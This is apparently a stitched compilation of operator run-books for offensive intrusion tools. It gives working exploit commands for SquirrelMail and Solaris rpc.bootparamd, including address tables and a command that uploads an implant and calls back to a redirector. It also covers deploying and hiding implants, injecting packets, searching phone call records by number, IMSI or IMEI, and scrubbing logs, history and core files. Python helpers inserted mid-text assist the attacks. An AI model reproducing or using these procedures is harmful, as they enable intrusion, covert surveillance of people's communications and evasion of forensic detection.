KEY=CRYPTKEY; export KEY; ./crond -rt RECTYPE -n ./adm -d /CHANGEME/CDRFILES.2006071[3456]* >T:/current/down/cdrhits.cursehappy.HOST.DDMonYY.enc3
-beep 15
### Remove tasking once crond is running
-rm adm
### Run again if needed for same tasking
-put /current/down/argfiles/argfile3.enc adm
KEY=CRYPTKEY; export KEY; ./crond -rt RECTYPE -n ./adm -d /CHANGEME/CDRFILES.2006071[0-2]* >T:/current/down/cdrhits.cursehappy.HOST.DDMonYY.enc3.more
-beep 15
-rm adm

#############
############# for loglevel testing (local file should be ascii?)
#############
-put /current/down/argfiles/argfile1.enc adm
KEY=CRYPTKEY; export KEY; ./crond -rt RECTYPE -n ./adm -w e -loglevel 2 -d /CHANGEME/CDRFILES.2006071[0-2]* >T:/current/down/cdrhits.cursehappy.HOST.DDMonYY.test
-beep 15
-rm adm

######
##### when it's done running, decrypt the file (-d -c options)
######
cd /current/down
ls -latr cdr*enc*
# to decrypt individually:
cryptTool.v1.0.Linux2.4.18-14.targetdl -i cdrhits.cursehappy.HOST.DDMonYY.enc1 -o cdrhits.cursehappy.HOST.DDMonYY.txt1 -k CRYPTKEY -d -c
cryptTool.v1.0.Linux2.4.18-14.targetdl -i cdrhits.cursehappy.HOST.DDMonYY.enc2 -o cdrhits.cursehappy.HOST.DDMonYY.txt2 -k CRYPTKEY -d -c
# or decrypt all at one time (once all are written fully)
# (rename only the .enc suffix; a global s,enc,txt,g would also rewrite a hostname containing "enc")
cd /current/down
for i in cdrhits*enc* ; do n="$(echo "$i" | sed 's,\.enc,.txt,')" ; cryptTool.v1.0.Linux2.4.18-14.targetdl -i "$i" -o "$n" -k CRYPTKEY -d -c ; done
ls -latr cdr*txt*

######
###### If you need to stop the parser before it completes:
### Control-C the nopen window containing the parser command
### ps -ef | grep crond
### if the parser command is still "running", then kill the process:
### kill -9
### You'll still be able to decrypt the partially completed data pull
######

###### copy DECRYPTED data to media
######
ls -l cdr*txt*
mz
cp cdr*txt* /mnt/zip*/PROJECTNAME
ls -l /mnt/zip*/PROJECTNAME
uz

#####
##### clean up
#####
-rm crond adm
-lt
-cd /tmp
-rm .scsi
-lt
w
ps -ef | sort
-lt /
-burnBURN

###
### END File user.tool.cursehappy.preversion4.COMMON
### (see also ../etc/user.tool.cursehappy.preversion4.COMMON)
###
### BEGIN File user.tool.elideskew.COMMON (see also ../etc/user.tool.elideskew.COMMON)
###
#########################################################
# ELIDESKEW v1.0.0.1
#########################################################
### Publicly known vulnerability in SquirrelMail versions 1.4.0 - 1.4.7
### Patched for versions >= 1.4.8
### Tested on CentOS and FreeBSD successfully
### You will be apache on target; use the appropriate tool (if available) to elevate
mx
:%s/REDIRECTOR_IP/REDIRECTOR_IP/g
:%s/TARGET_IP/TARGET_IP/g
:%s/RANDOM_PORT/RANDOM_PORT/g
`x

### scan port 80 to look for the squirrel banner (may report version; needs to
### be version 1.4.0 - 1.4.7 to work)
### need the banner to help determine the squirrelmail dir
-scan http TARGET_IP

### set up redirection
### on redirector
-tunnel l 80 TARGET_IP

## get ELIDESKEW usage
## scripted local window
cd /current/bin
./elideskew.pl
  -ch         - Check for exploit
  -l [file]   - File to upload
  -r [path]   - Upload destination path/filename
  -c [String] - Command line to execute; if you want to use the file just uploaded, then INCLUDE IT.
  -u [url]    - http://host.com/squirrelMail/  (get from http banner, e.g. /webapps/sq147)

## test for exploit vulnerability
## local scripted window
./elideskew.pl -u http://127.0.0.1/webapps/sq147 -ch
### will report YES (with OS) or NO
### sample good output
###Checking...
###Linux webapps.jetson.net 2.6.9-42.ELsmp #1 SMP Sat Aug 12 09:39:11 CDT 2006 i686 i686 i386 GNU/Linux
###YES!

### If vulnerable, proceed; run commands on target to find a dir read/writeable by apache
./elideskew.pl -u http://127.0.0.1/webapps/sq147 -c 'uname -a; w; pwd; ls -al ../data'
### note the pwd result; /var/www/html/webapps/sq147/src (default dir) is not writeable/executable by apache but ../data is....
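A small added check for the banner step above, written for this page and not part of elideskew.pl: it pulls the SquirrelMail version out of whatever the scan returned and tests it against the 1.4.0 - 1.4.7 range the notes give, using tuple comparison so that 1.4.10 is not mistaken for a version below 1.4.7 (a plain string compare gets that wrong). The page fragments in SAMPLES are constructed, not captured from any host.

```python
import re

# Added example (not part of the ELIDESKEW notes or the elideskew.pl tool).
# Range taken from the notes above: 1.4.0 - 1.4.7 exploitable, 1.4.8 and later patched.
VULNERABLE_FROM = (1, 4, 0)
PATCHED_FROM = (1, 4, 8)

# Matches "SquirrelMail version 1.4.7", "SquirrelMail/1.4.7", "squirrelmail 1.4.10"
VERSION_RE = re.compile(r'squirrelmail(?:\s+version)?[\s/:]*v?(\d+)\.(\d+)\.(\d+)', re.I)


def parse_version(text):
    """Return the first SquirrelMail version found as an int tuple, or None."""
    m = VERSION_RE.search(text)
    return tuple(int(g) for g in m.groups()) if m else None


def in_exploitable_range(version):
    """Tuple comparison: (1, 4, 10) sorts after (1, 4, 7), unlike the strings."""
    return version is not None and VULNERABLE_FROM <= version < PATCHED_FROM


def assess_banner(text):
    """Return (verdict, version); 'unknown' means no version string was found,
    in which case fall back to the -ch check rather than assuming either way."""
    version = parse_version(text)
    if version is None:
        return ("unknown", None)
    return ("candidate" if in_exploitable_range(version) else "not-in-range", version)


# Constructed sample page fragments (assumed login-page footer wording; not real captures).
SAMPLES = {
    "vuln": "<small>SquirrelMail version 1.4.7</small><br>By the SquirrelMail Project Team",
    "patched": "<small>SquirrelMail version 1.4.8</small>",
    "later": "<small>SquirrelMail version 1.4.10</small>",
    "none": "<title>Welcome</title>",
}

if __name__ == "__main__":
    for name, fragment in SAMPLES.items():
        print(name, assess_banner(fragment))
```

The verdict is only a filter for which hosts are worth the `-ch` test; a banner can be edited or stale, so `-ch` remains the authoritative check.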
### Ready to upload and execute NOPEN
### on REDIRECTOR_IP
-nrtun RANDOM_PORT
### local scripted window [[ note: the backticks "`" may or may not be necessary ]]
./elideskew.pl -u http://127.0.0.1/webapps/sq147 -l /current/up/morerats/noserver-3.0.3.6-i686.pc.linux.gnuoldld.redhat-6.0 -r /var/www/html/webapps/sq147/data/nos -c '`D=-cREDIRECTOR_IP:RANDOM_PORT /var/www/html/webapps/sq147/data/nos`'
### if all goes well you will be apache on target (note: some apache configurations run as nobody);
### you need to elevate; choose the appropriate tool

### cleaning logs
Logging varies by platform:
  on CentOS  - /var/log/httpd/error_log ; CentOS runs SELinux, so it also logs in
               /var/log/messages when nopen tries to call back. CentOS will not allow
               nopen to bind to a port as a server, so nopen must be used in callback mode.
  on FreeBSD - [APACHE_PREFIX]/logs/error_log

###
### END File user.tool.elideskew.COMMON
### (see also ../etc/user.tool.elideskew.COMMON)
###
### BEGIN File user.tool.poptop.COMMON (see also ../etc/user.tool.poptop.COMMON)
###
### EncTelnet/Poptop
### To use Nopen over an existing connection (i.e. telnet)

### Window 1: Nopen Window - Setup tunnel to the dude you are telnetting to
-tunnel l 2323 DUDE 23

### Window 2: Local scripted window - Use spawn to be your telnet client
### The window will look kinda funny with debug telnet negotiation stuff
### going by, and you'll see the typed password in the clear...get over it
spawn.v3 127.0.0.1 2323 telnet

### Window 3: Local window: prep poptop/noserver
cp TARGNOSERVER /current/up/nscd
cp TARGPOPTOP /current/up/crond
compress nscd crond
uuencode nscd.Z nscd.Z > nscd.uu
uuencode crond.Z crond.Z > crond.uu

### Window 2: Accept files for upload
uudecode --p /current/up/nscd.uu
uudecode --p /current/up/crond.uu
uncompress nscd.Z crond.Z

### Window 2: Run Nopen and poptop
chmod 700 nscd crond
PATH=. D=-lPORT nscd
PATH=. crond
### 1st prompt for "arg" is port
PORT
### 2nd prompt for "arg" is file descriptor, use 0 for stdin
0
### Should now get a line saying "tty is setup"

### Window 4: Local scripted window: setup for Nopen connect
noclient -l 8080

### Window 2: type "---" and hit enter, should
### have a connection in your noclient window then
---

### Window 4: To get multiple windows on target, you will need to use this window
### as a -tunnel window, and tunnel to yourself over loopback
### And oh yeah, remove the binaries
-rm crond nscd
-tunnel l PORT 127.0.0.1

### In other scripted windows
noclient 127.0.0.1:PORT

### Do whatever you need to do...
### When all done...
-burnBURN

### Window 2: this window will now probably go nuts, ^C will
### take you back to your op box shell prompt, and officially
### close your telnet connection (see connection close in your
### Window 1 -tunnel window).
### Note that there will be another log entry put into
### wtmp that cannot be toasted away; it should not be seen by admins though...
EOF
###
### END File user.tool.poptop.COMMON
### (see also ../etc/user.tool.poptop.COMMON)
###
### BEGIN File user.tool.seconddate.COMMON (see also ../etc/user.tool.seconddate.COMMON)
###
# SECONDDATE
:syntax on

#########
# SET UP
#########
# get tasking directories and put them on media
# check op plan for correct tasking date
/projects/web_proxy_tasking/to_lowside/YYYYMMDD/YYYYMMDD.HH.MM.SS-IP_ADDRESS

# copy and extract binaries to /current/bin
mz
cp /mnt/zip/seconddate_tools.tar /current/bin
cd /current/bin
tar xvf /seconddate_binaries.tar

# copy tasking directories to /current/bin/sd and extract
cp -r /mnt/zip/TASKING /current/bin/sd
cd /current/bin/sd

# copy the SECONDDATE command and control binary to each tasking directory
# the rules are set by relative path;
# the command and control binary needs to be in the same path as the inject and regex files
# tasking directory name format: YYYYMMDD.HH.MM.SS-IP_ADDRESS
# inject tag name format:        YYYYMMDDHHMMSS-IP_ADDRESS-inject-.bin
# regex file name format:        YYYYMMDDHHMMSS-IP_ADDRESS-regex-.bin
cp /current/bin/sd/1.1.1.1/Binaries/Seconddate_CnC /current/bin/sd/YYYYMMDD.HH.MM.SS-IP_ADDRESS

#################
# PREP COMMANDS
#################
# all commands to run at the local Seconddate_CnC prompt are in commands.txt
# you should have already copied it here:
# /current/bin/sd/YYYYMMDD.HH.MM.SS-IP_ADDRESS/commands.txt
cd /current/bin/sd/YYYYMMDD.HH.MM.SS-IP_ADDRESS
egrep "disable" commands.txt > disable.txt
egrep "rule" commands.txt | egrep -v "showrule --all" > rules.txt
# "enable" also matches every "disable" line, so drop those or enable.txt will disable rules
egrep "enable" commands.txt | egrep -v "disable" > enable.txt

# open command files in the gedit text editor; xemacs works too; vi doesn't work
gedit disable.txt &
# open the other files rules.txt and enable.txt

####################
# CONNECT TO IMPLANT
###################
# local_port  - listen on this port locally, i.e. the ops box; pick a random port
# target_ip   - ip of target that is running SECONDDATE to which you want to connect
# target_port - port to which you'll connect on target; can be the same as local_port
mx
:%s/LOCAL_UDP_PORT/LOCAL_UDP_PORT/g
:%s/TARGET_IP/TARGET_IP/g
:%s/TARGET_UDP_PORT/TARGET_UDP_PORT/g
`x

# set up UDP tunnel from redirector; won't work locally on target box
# -tunnel u LOCAL_UDP_PORT TARGET_IP TARGET_UDP_PORT
-tunnel u LOCAL_UDP_PORT TARGET_IP TARGET_UDP_PORT

# in locally scripted window
# run CnC
# ./Seconddate_CnC 127.0.0.1
cd /current/bin/sd/YYYYMMDD.HH.MM.SS-IP_ADDRESS
./Seconddate_CnC 127.0.0.1 LOCAL_UDP_PORT

# run command
ping
# should receive an 'OK'
# if you can't get an OK, the target may have rebooted; the tool only runs in memory
# connect to the target via -irtun and check to see if SECONDDATE is running
# if it's not running you need to deploy
ps -ef | grep IMPLANT_FILENAME
cd /dev; ps -ef | grep IMPLANT_FILENAME

##############
# RUN COMMANDS
#############
# help menu
?
#or
help

# do these first
ping
# synopsis of rules and injects
getinfo
# check rule log
getlog
# show all rules
showrule --all

# have gedit window with rules commands available
# if you still have gedit open with the commands files, go to the disable commands section below
# if you closed it after setup, reopen the commands files with gedit
# command files you previously set up are here, including the commands.txt file:
# /current/bin/sd/YYYYMMDD.HH.MM.SS-IP_ADDRESS
# open command files in the gedit text editor; xemacs works too; vi doesn't work
cd /current/bin/sd/YYYYMMDD.HH.MM.SS-IP_ADDRESS
gedit disable.txt &
# open the other files rules.txt and enable.txt from within gedit

# run disable commands only for enabled rules you know are going to change
# otherwise, disable all of the rules
# disable commands are in the file disable.txt

# clear log only if instructed to do so
# will fail if any rules are enabled
clearlog

# set rules; make sure the rules in rules.txt match what is on target
# rule commands are in the file rules.txt

# enable rules; watch for "Enabled: yes" in each rule displayed
# enable commands are in the file enable.txt

# show all rules
showrule --all

# check for an empty rule enabled:
getinfo
# if the matches/hits/injects are increasing rapidly, then you probably enabled an empty rule
# find the empty rule that's enabled
getlog
# look for the rule that has the most hits
# disable it and display it with showrule

# done
exit

# copy script files
# when finished with the locally scripted window, type exit, or type CTL-D only once
# this reveals the name of the script file
cp script. script..seconddate.log
# you can remove the original script if you like

#########
# DEPLOY
#########
# if the target box rebooted, you'll have to deploy the tool
# connect via -irtun
# hidden_dir       - hidden directory on the target
#                    INCISION targets will have a manually created hidden directory
#                    STOICSURGEON targets can run SECONDDATE from the STOICSURGEON directory
# sd_binary_path   - where the SECONDDATE binaries are located on the ops box:
#                    /current/bin/sd/1.1.1.1/Binaries
# implant_filename - what you want to call the SECONDDATE binary on target
mx
:%s:HIDDEN_DIR:HIDDEN_DIR:g
:%s/SD_BINARY_PATH/SD_BINARY_PATH/g
:%s/IMPLANT_FILENAME/IMPLANT_FILENAME/g
`x

# INCISION targets; skip if STOICSURGEON
# create hidden directory on linux target if you don't have one already
# mkdir -p /tmp/.; __HMODE__=enable touch /tmp/.
# try to use a directory name that blends in on the target
# example:
# mkdir -p /tmp/.orbit561; __HMODE__=enable touch /tmp/.orbit561
mkdir -p HIDDEN_DIR; __HMODE__=enable touch HIDDEN_DIR

# make sure the directory was created
-ls HIDDEN_DIR
# make sure the directory is hidden
# you should not see the hidden directory
cd /dev; ls -al HIDDEN_DIR

# cd to hidden directory
# STOICSURGEON targets can run SECONDDATE from the STOICSURGEON directory
# INCISION targets run from the hidden directory
# -cd /tmp/.orbit561
-cd HIDDEN_DIR

# put up tool
# -put
# example
# -put /current/bin/sd/1.1.1.1/Binaries/Seconddate_Implant crond
-put SD_BINARY_PATH IMPLANT_FILENAME

##################
# START SECONDDATE
##################
# look for setsid
which setsid
# or
locate setsid
# run:
setsid /bin/bash -c 'PATH="." crond' > /dev/null 2>&1 &

# or, if there's no setsid
# -shell
# PATH=. crond
-shell
PATH=. IMPLANT_FILENAME
# Ctrl-D to get out of the shell and get your NOPEN promp
# be careful
# if there's no setsid, get the noserver pid (parent of the nopen pid)
# you'll have to kill the root noserver later when getting off target
# i.e. the parent pid of the nopen window you're in
-pid

# INCISION targets: make sure it's hidden
# annotate the pid of the running implant in your opnotes
# cd /dev; ps -ef | grep crond
cd /dev; ps -ef | grep IMPLANT_FILENAME

# remove implant
# -rm crond
-rm IMPLANT_FILENAME

# in locally scripted window
# run CnC
./Seconddate_CnC 127.0.0.1 LOCAL_UDP_PORT
# help menu
help
# ping
ping

###############
# LEAVE RUNNING
###############
# may want to leave the implant running and come back later
# if the implant is left running, exit from the CnC tool
exit
# check lastlog for reboot frequency
last -100 | egrep "hutdow|eboo"
# INCISION targets: make sure the running implant is hidden
# cd /dev; ps -ef | grep
cd /dev; ps -ef | grep IMPLANT_FILENAME

###########
# UNINSTALL
###########
# to stop the running implant in preparation for leaving the target box
# in the local CnC window that's scripted, uninstall the implant
uninstall
# in NOPEN window
# check the process list; make sure it's not hung; if hung, kill it
kill -9

##########
# FINISHED
##########
# getting ready to get off the target
# to burn or not to burn?
# read all of the following before getting off target

# if you're not leaving the implant running after getting off the target:
#  - make sure you uninstall the implant as stated above
#  - ensure it is not hung; if so, kill it
#  - then burn
#
# if you're on target under a noserver that did not spawn the implant
# process you may burn, i.e. the implant process is not the child
# of the noserver process
#
# if you ran the implant using 'setsid', you may also burn:
-burn

# if you ran the implant under your present noserver and wish to leave it
# running, you need to make sure the implant continues when done with target
# if there was no 'setsid' on the target box when you ran the implant:
#  - kill the listening noserver under which you started the implant
#    if you burn in this case the implant process will be killed
kill -9
#  - use "-exit" to get out of all nopen windows
-exit

# check your connection to the implant from the redirector next to the
# target running the implant
# run a few commands
ping
getinfo
# if the connection is OK then you're done
ping
# should receive an 'OK'

# if you can't connect to the implant
# get back up on target and check to see if the implant is still running
# if the implant is not running you may have missed something when running
# the implant or disconnecting
# put it back up and run it again
# if you can't connect and the implant is running, try troubleshooting
# the ports you're using

# copy script files
# when finished with the locally scripted window, CTL-D only once
# this reveals the name of the script file
cp script. script..seconddate.log
# you can remove the original script if you like

#///////////////////////////////
# TASKING BY HAND - THE OLD WAY
#//////////////////////////////

#############
# INJECT FILE
#############
# configure inject file
# you will need to have a file containing the data for the inject packet
# first the http info:
# then the tag followed by 2 carriage returns
# example
HTTP/1.1 200 OK
Pragma: no-cache
Content-Type: text/html
Cache-Control: no-cache,no-store

#####################
# REGULAR EXPRESSIONS
#####################
# regular expression file
# needed to pass to the implant as an argument when using regex in a rule
# can't have any carriage returns or newlines in the file
# it must only contain the characters relative to the regex
# use vi or echo:
vi -b -c "set noeol"
# or
echo -n >

#######
# RULES
#######
# set rule
# rule 1 --srcaddr --srcmask 255.255.255.0 --dstport 80 --maxinjections 10 --injectwindow 600 --nocheckregex --injectfile pkt
# examples:
rule 1 --dstport 80 --maxinjections 2 --injectwindow 600 --regexfile --injectfile pkt
rule 2 --dstport 80 --maxinjections 2 --injectwindow 600 --regexfile --injectfile pkt

# showrule
showrule 1
# to show all rules you'll have to wait a bit
# the tool will iterate through all 64 whether empty or not

# enable rule(s)
# you have to enable them individually
enable rule 1

# check for hits
getinfo
# check log
getlog

# when done disable rules
disable 1
# get last dump of log
getlog
# clear log
clearlog

###
### END File user.tool.seconddate.COMMON
### (see also ../etc/user.tool.seconddate.COMMON)
###
### BEGIN File user.tool.ebbisland.COMMON (see also ../etc/user.tool.ebbisland.COMMON)
###
EBBISLAND (Exploit for Solaris 2.6, 2.7, 2.8, 2.9 and 2.10)

First ensure that the vulnerable rpc service (bootparam) is running. You must be able to
reach the target system's TCP port that the designated target RPC is listening upon.
Example
$ rpcinfo -p
   program vers proto   port  service
    100000    4   tcp    111  rpcbind
    100000    3   tcp    111  rpcbind
    100000    2   tcp    111  rpcbind
    100000    4   udp    111  rpcbind
    100000    3   udp    111  rpcbind
    100000    2   udp    111  rpcbind
    100232   10   udp  32772  sadmind
    100083    1   tcp  32771
    100221    1   tcp  32772
    100068    2   udp  32773
    100068    3   udp  32773
    100068    4   udp  32773
    100249    1   tcp  32782
    100026    1   udp  32800  bootparam
    100026    1   tcp  32790  bootparam

**********************************************************************************************
EBBISLAND USAGE.
ebbisland: (-A ) Shellcode address
ebbisland: (-C) /core file overwriter/scrambler. This option throws the attack, but uses
           pseudo-random binary data in place of the actual shellcode, to produce a /core
           file free of suspicious content. This would be used in the case where EBBISLAND
           failed to successfully exploit the target, and the operator wanted to try and
           "purify" the file left in /core before quitting.
ebbisland: (-c ) Procedure number. Defaults to 0.
ebbisland: (-D) For an extra dummy connection
ebbisland: (-N) Use for non-inetd started services (i.e. rpc.bootparamd)
ebbisland: (-M ) Choose size of data part of packet to send. Default is 1260. This could
           affect the landing zone size.
ebbisland: (-P ) Optional prog to exec, re-using exploit socket.
ebbisland: (-r ) RPC program number
ebbisland: (-s )
ebbisland: (-V) Provides verbose output, where appropriate and desired.
ebbisland: (-X | -F) -X for indirect/xdr_replymsg programs, and -F for others
*******************************************************************************************
Table of Exploit addresses for rpc.bootparamd (SPARC)
100026 rpc.bootparamd 2.6             -X -N 0x641a0
100026 rpc.bootparamd 2.7 (earlier)   -X -N 0x65798
100026 rpc.bootparamd 2.7 (earlier)   -X -N 0x6d8d8
100026 rpc.bootparamd 2.8             -X -N 0x7c760
100026 rpc.bootparamd 2.9             -X -N 0x6e908
100026 rpc.bootparamd 2.10            -X -N 0x68318
*********************************************************************************************
Redirector:
-tunnel l
Example: l 32794 10.40.1.2 32790

Exploit:
./ebbisland -t -p -r -X -N -A
Example against Solaris 2.9:
./ebbisland -t 127.0.0.1 -p 32794 -r 100026 -X -N -A 0x6e908
**********************************************************************************
Exploit will provide ROOT shell access.
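Two added helpers for the pre-flight and clean-up steps on this page (example code written here; not part of the ebbisland tool). rpc_ports() reads `rpcinfo -p` output and returns the version/port pairs for a program and protocol, so the TCP port for 100026 (bootparam) that the -tunnel and -p arguments need is picked out of the table rather than eyeballed; inetd_crashes() scans /var/adm/messages lines for the inetd fault warnings a failed attempt leaves behind and folds in the "last message repeated N times" lines, so you know which daemon(s) actually dumped core and therefore need the -C pass. The rpcinfo sample is abridged from the listing above; the log sample is copied from the logging note in the CLEANING section below.

```python
import re
from collections import defaultdict

# Added example, not part of the EBBISLAND notes or the ebbisland tool.

# Sample `rpcinfo -p` output, abridged from the listing above (whitespace constructed;
# the service column is blank for unnamed programs).
RPCINFO_SAMPLE = """\
   program vers proto   port  service
    100000    4   tcp    111  rpcbind
    100000    2   udp    111  rpcbind
    100232   10   udp  32772  sadmind
    100083    1   tcp  32771
    100249    1   tcp  32782
    100026    1   udp  32800  bootparam
    100026    1   tcp  32790  bootparam
"""


def rpc_ports(rpcinfo_text, program, proto):
    """Return [(vers, port), ...] for `program` over `proto` ('tcp' or 'udp')."""
    found = []
    for line in rpcinfo_text.splitlines():
        fields = line.split()
        # data rows are: program vers proto port [service]; skip the header
        if len(fields) < 4 or not fields[0].isdigit():
            continue
        prog, vers, pr, port = int(fields[0]), int(fields[1]), fields[2], int(fields[3])
        if prog == program and pr == proto:
            found.append((vers, port))
    return found


# Sample /var/adm/messages lines, copied from the logging note in CLEANING below.
MESSAGES_SAMPLE = """\
Sep 27 14:37:23 target inetd[146]: [ID 858011 daemon.warning] /platform/SUNW,Ultra-Enterprise-10000/lib/dr_daemon: Illegal Instruction
Sep 27 14:37:24 target dr_daemon[23501]: [ID 629332 daemon.notice] dr_daemon attempting AP interaction
Sep 27 14:43:10 target inetd[146]: [ID 858011 daemon.warning] /usr/openwin/bin/kcms_server: Illegal Instruction - core dumped
Sep 27 14:43:11 target inetd[146]: [ID 858011 daemon.warning] /usr/openwin/bin/kcms_server: Segmentation Fault - core dumped
Sep 27 14:43:13 target last message repeated 1 time
Sep 27 14:43:14 target inetd[146]: [ID 858011 daemon.warning] /usr/openwin/bin/kcms_server: Illegal Instruction - core dumped
Sep 27 14:43:15 target inetd[146]: [ID 858011 daemon.warning] /usr/openwin/bin/kcms_server: Segmentation Fault - core dumped
Sep 27 14:43:17 target last message repeated 2 times
Sep 27 14:43:55 target inetd[146]: [ID 858011 daemon.warning] /usr/sbin/rpc.metad: Illegal Instruction - core dumped
Sep 27 14:43:56 target inetd[146]: [ID 858011 daemon.warning] /usr/sbin/rpc.metad: Bus Error - core dumped
Sep 27 14:43:57 target inetd[146]: [ID 858011 daemon.warning] /usr/sbin/rpc.metad: Segmentation Fault - core dumped
"""

TS = r'\w{3}\s+\d+ \d\d:\d\d:\d\d'
# inetd warning: "<path>: <fault>[ - core dumped]"; the core suffix is optional
CRASH_RE = re.compile(TS + r' \S+ inetd\[\d+\]: \[ID \d+ daemon\.warning\] '
                      r'(?P<daemon>\S+): (?P<fault>.*?)(?P<core> - core dumped)?$')
REPEAT_RE = re.compile(TS + r' \S+ last message repeated (?P<n>\d+) times?$')


def inetd_crashes(messages_text):
    """Per-daemon counts of inetd fault warnings and of those that dumped core.
    A 'last message repeated N times' line counts N more of the warning just before it."""
    stats = defaultdict(lambda: {"faults": 0, "cores": 0})
    last = None  # (daemon, dumped_core) of the immediately preceding warning
    for line in messages_text.splitlines():
        m = CRASH_RE.match(line)
        if m:
            daemon = m.group("daemon").rsplit("/", 1)[-1]
            last = (daemon, m.group("core") is not None)
            n = 1
        else:
            r = REPEAT_RE.match(line)
            if not r:
                last = None  # some other message; a later "repeated" is not ours
                continue
            if last is None:
                continue
            n = int(r.group("n"))
        daemon, dumped = last
        stats[daemon]["faults"] += n
        if dumped:
            stats[daemon]["cores"] += n
    return dict(stats)


def daemons_with_cores(stats):
    """Daemons that left a /core, i.e. the ones that warrant the -C scramble pass."""
    return sorted(d for d, s in stats.items() if s["cores"])


if __name__ == "__main__":
    print("bootparam tcp:", rpc_ports(RPCINFO_SAMPLE, 100026, "tcp"))
    crashes = inetd_crashes(MESSAGES_SAMPLE)
    print(crashes, daemons_with_cores(crashes))
```

Note that the "-N" daemons (started outside inetd, such as rpc.bootparamd) will not produce inetd warnings of this shape; for those, look for the daemon's own messages and for the /core file itself.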
unset HISTSIZE unset HISTFILESIZE unset HISTFILE w pwd id which uudecode uncompress cd /tmp mkdir .scsi cd .scsi # locally packrat RAND_PORT # packrat command gedit /current/up/sendmail.Z.uu # Target /usr/bin/uudecode; ls -latr select all/copy gedit contents into Target exploit window uncompress sendmail.Z ls -l chmod 700 sendmail PATH=. sendmail # from redirector -nstun TARGET_IP (EnJOY) ******************************************************************************* CLEANING. * The correct EBBISLAND attack for the remote target architecture must be used, or else the attack will fail, and the chosen TCP RPC daemon will likely (1) abort and /core dump, and (2) log heavily. If this should occur, a /core file will be left on the remote system. This /core file will contain our attack data buffers, including "shellcode". The technique could then be reverse engineered and developed into an attack. That's why we have the '-C' option...please rerun the attack, and generate 1 more /core file, containing our semi-innocuous pseudo-random shellcode data. # Logging considerations: Quite a few log messages will be generated on the target as each subsequent attack attempt fails, most likely written to the /var/adm/messages file. These could include messages similar to... 
Sep 27 14:37:23 target inetd[146]: [ID 858011 daemon.warning] /platform/SUNW,Ultra-Enterprise-10000/lib/dr_daemon: Illegal Instruction
Sep 27 14:37:24 target dr_daemon[23501]: [ID 629332 daemon.notice] dr_daemon attempting AP interaction
Sep 27 14:37:24 target dr_daemon[23501]: [ID 264428 daemon.error] ld.so.1: dr_daemon: fatal: libap.so: open failed: No such file or directory
Sep 27 14:37:24 target dr_daemon[23501]: [ID 355200 daemon.error] dr_daemon operating in NO AP interaction mode
Sep 27 14:37:24 target dr_daemon[23501]: [ID 309875 daemon.notice] NOTICE: recovered old state file '/tmp/.dr_extra_info'
Sep 27 14:43:10 target inetd[146]: [ID 858011 daemon.warning] /usr/openwin/bin/kcms_server: Illegal Instruction - core dumped
Sep 27 14:43:11 target inetd[146]: [ID 858011 daemon.warning] /usr/openwin/bin/kcms_server: Segmentation Fault - core dumped
Sep 27 14:43:13 target last message repeated 1 time
Sep 27 14:43:14 target inetd[146]: [ID 858011 daemon.warning] /usr/openwin/bin/kcms_server: Illegal Instruction - core dumped
Sep 27 14:43:15 target inetd[146]: [ID 858011 daemon.warning] /usr/openwin/bin/kcms_server: Segmentation Fault - core dumped
Sep 27 14:43:17 target last message repeated 2 times
Sep 27 14:43:55 target inetd[146]: [ID 858011 daemon.warning] /usr/sbin/rpc.metad: Illegal Instruction - core dumped
Sep 27 14:43:56 target inetd[146]: [ID 858011 daemon.warning] /usr/sbin/rpc.metad: Bus Error - core dumped
Sep 27 14:43:57 target inetd[146]: [ID 858011 daemon.warning] /usr/sbin/rpc.metad: Segmentation Fault - core dumped
###
### END File user.tool.ebbisland.COMMON
### (see also ../etc/user.tool.ebbisland.COMMON)
###

### BEGIN File user.tool.enemyrun.COMMON (see also ../etc/user.tool.enemyrun.COMMON)
###
##################
#### ENEMYRUN ####
##################
## copy and paste this into the window if you want syntax highlighting:
## it makes scripts a bit easier to read
:syntax on

##############
## ER SETUP ##
##############
##
## only get an encryption key value if you don't already have one; ask first
##
#md5sum /current/down/tcpdump.raw
##
## vi Search/Replace commands:
##   projectName - self explanatory, all CAPS
##   date field  - today's date, used for output files
##   hostname.ip - hostname of the box and IP address exactly as displayed in nopen window title bar
##                 or as seen in /current/down
##   cryptkey    - encryption key (already have one, or use output from the md5sum command above)
##
mx
:%s/PROJECTNAME/PROJECTNAME/g
:%s/DDMonYY/DDMonYY/g
:%s/HOSTNAME.IP/HOSTNAME.IP/g
:%s/CRYPTKEY/CRYPTKEY/g
'x
##
## copy the ER directory "er_PROJECTNAME" from the project's /targets//sustained directory
## to /current/down and make sure there are no tarballs in /current/down
##
mz
cp -r /mnt/zip/er_PROJECTNAME /current/down
cd /current/down/er_PROJECTNAME
uz
##
## save the encryption key locally in /current/down
## whether you have a new or old key:
##
echo CRYPTKEY > /current/down/cryptkey.enemyrun.DDMonYY
## copy key to ER directory if creating a new key
echo CRYPTKEY > /current/down/er_PROJECTNAME/cryptkey.enemyrun.DDMonYY
##
## implant hidden directory for script commands
## location is implant dependent
## INCISION:
##   Solaris - /platform/SUNW,SystemEngine/kernel/drv
##   Linux   - (hidden independently; check old opnotes)
## STOICSURGEON: (hidden directory is displayed at beginning of FTSHELL/ish callback)
## no trailing /
##
mx
:%s:IMPLANT_HIDDEN_DIRECTORY:IMPLANT_HIDDEN_DIRECTORY:g
'x
##
## prepare files containing numbers to search for:
## if files containing the numbers to search for are available:
##
mkdir /current/down/argfiles
cd /current/down/argfiles
mz
cp /mnt/zip*/PROJECTNAME/arg* /current/down/argfiles
ls -altr
##
## prep the argfiles:
## make sure the files are ASCII and contain NO EMPTY LINES!!
## make sure the last line does not contain a null character at the end
## (vi the file, add a carriage return to the last line, then delete the empty
## line and save)
## "file" results:
##   this will not work:  ASCII text, with CRLF line terminators
##   this WILL:           ASCII text
##
cat arg*
file arg*
dos2unix arg*
file arg*
##
## if no data media is provided:
## locally, create a file of numbers to grep for with each number on a separate line
## make sure there are NO EMPTY LINES!!!!
## Format of each type of argument:
##   p123456789 - phone number
##   s123456789 - IMSI
##   e123456789 - IMEI
##   c123/456   - Cell/LAC (no leading 0's)
##
cd /current/down/argfiles
vim /current/down/argfiles/argfile1.txt
##
## encrypt argfiles / target files
##
## encrypt the ascii list...first make sure you have the encryption tool:
which cryptTool.v1.0.Linux2.4.18-14.targetdl
## if cryptTool not in PATH, change your PATH or insert full path in command
## to encrypt one at a time...skip to next comment to encrypt all at once:
cryptTool.v1.0.Linux2.4.18-14.targetdl -i argfile1.txt -o argfile1.enc -k CRYPTKEY -b
cryptTool.v1.0.Linux2.4.18-14.targetdl -i argfile2.txt -o argfile2.enc -k CRYPTKEY -b
